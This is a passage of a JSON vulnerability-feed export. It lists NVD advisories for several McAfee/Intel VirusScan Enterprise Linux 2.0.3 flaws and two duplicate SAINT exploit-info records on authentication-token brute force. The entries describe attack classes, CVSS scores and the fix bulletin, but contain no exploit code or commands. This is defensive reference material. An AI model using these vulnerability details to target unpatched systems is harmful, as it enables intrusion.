(VSEL) 2.0.3 (and earlier) allows authenticated remote attackers to obtain the existence of unauthorized files on the system via a URL parameter.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8016", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8016", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8016", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Authentication bypass by assumed-immutable data vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote unauthenticated attacker to bypass server authentication via a crafted authentication cookie.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8023", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8023", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8023", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Improper neutralization of CRLF sequences in HTTP headers vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote unauthenticated attacker to obtain sensitive information via the server HTTP response spoofing.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8024", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8024", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8024", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Improper verification of cryptographic signature vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote authenticated users to spoof update server and execute arbitrary code via a crafted input file.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8021", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8021", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8021", "type": "cve", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Cross-site scripting (XSS) vulnerability in attributes in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows unauthenticated remote attackers to inject arbitrary web script or HTML via a crafted user input.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8019", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8019", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8019", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Improper control of generation of code vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote authenticated users to execute arbitrary code via a crafted HTTP request parameter.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8020", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8020", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8020", "type": "cve", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:40", "bulletinFamily": "NVD", "description": "Authentication bypass by spoofing vulnerability in Intel Security VirusScan Enterprise Linux (VSEL) 2.0.3 (and earlier) allows remote unauthenticated attacker to execute arbitrary code or cause a denial of service via a crafted authentication cookie.", "modified": "2017-09-03T01:29:00", "id": "CVE-2016-8022", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8022", "published": "2017-03-14T22:59:00", "title": "CVE-2016-8022", "type": "cve", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "description": "Added: 12/23/2016 \nCVE: [CVE-2016-8023](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8023>) \nBID: [94823](<http://www.securityfocus.com/bid/94823>) \n\n\n### Background\n\n[McAfee VirusScan Enterprise for Linux](<http://www.mcafee.com/us/products/virusscan-enterprise-for-linux.aspx>) is real-time, anti-malware software for Linux. \n\n### Problem\n\nMcAfee VirusScan Enterprise for Linux allows remote attackers to execute arbitrary commands by exploiting multiple vulnerabilities, including the ability to brute-force authentication tokens, a file write vulnerability using a malicious update server, and an authenticated file execution vulnerability. \n\n### Resolution\n\nApply the fix referenced in [McAfee Security Bulletin SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>). \n\n### References\n\n<https://nation.state.actor/mcafee.html> \n<http://news.softpedia.com/news/vulnerabilities-found-in-linux-security-software-can-give-hackers-root-access-510936.shtml> \n\n\n### Limitations\n\nExploit works on McAfee VirusScan Enterprise for Linux 1.9.2 through 2.0.2. Since this exploit uses a brute-force attack it may take some time to run. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "id": "SAINT:3F45369261059DA84B497885AF5B9BCB", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/mcafee_virus_scan_linux_brute", "title": "McAfee VirusScan Enterprise for Linux authentication token brute force", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T19:19:30", "bulletinFamily": "exploit", "description": "Added: 12/23/2016 \nCVE: [CVE-2016-8023](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8023>) \nBID: [94823](<http://www.securityfocus.com/bid/94823>) \n\n\n### Background\n\n[McAfee VirusScan Enterprise for Linux](<http://www.mcafee.com/us/products/virusscan-enterprise-for-linux.aspx>) is real-time, anti-malware software for Linux. \n\n### Problem\n\nMcAfee VirusScan Enterprise for Linux allows remote attackers to execute arbitrary commands by exploiting multiple vulnerabilities, including the ability to brute-force authentication tokens, a file write vulnerability using a malicious update server, and an authenticated file execution vulnerability. \n\n### Resolution\n\nApply the fix referenced in [McAfee Security Bulletin SB10181](<https://kc.mcafee.com/corporate/index?page=content&id=SB10181>). \n\n### References\n\n<https://nation.state.actor/mcafee.html> \n<http://news.softpedia.com/news/vulnerabilities-found-in-linux-security-software-can-give-hackers-root-access-510936.shtml> \n\n\n### Limitations\n\nExploit works on McAfee VirusScan Enterprise for Linux 1.9.2 through 2.0.2. Since this exploit uses a brute-force attack it may take some time to run. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2016-12-23T00:00:00", "published": "2016-12-23T00:00:00", "id": "SAINT:9BB81EFD042AB3DA9DDEDA9585D54BE2", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/mcafee_virus_scan_linux_brute", "title": "McAfee VirusScan Enterprise for Linux authentication token brute force", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}]}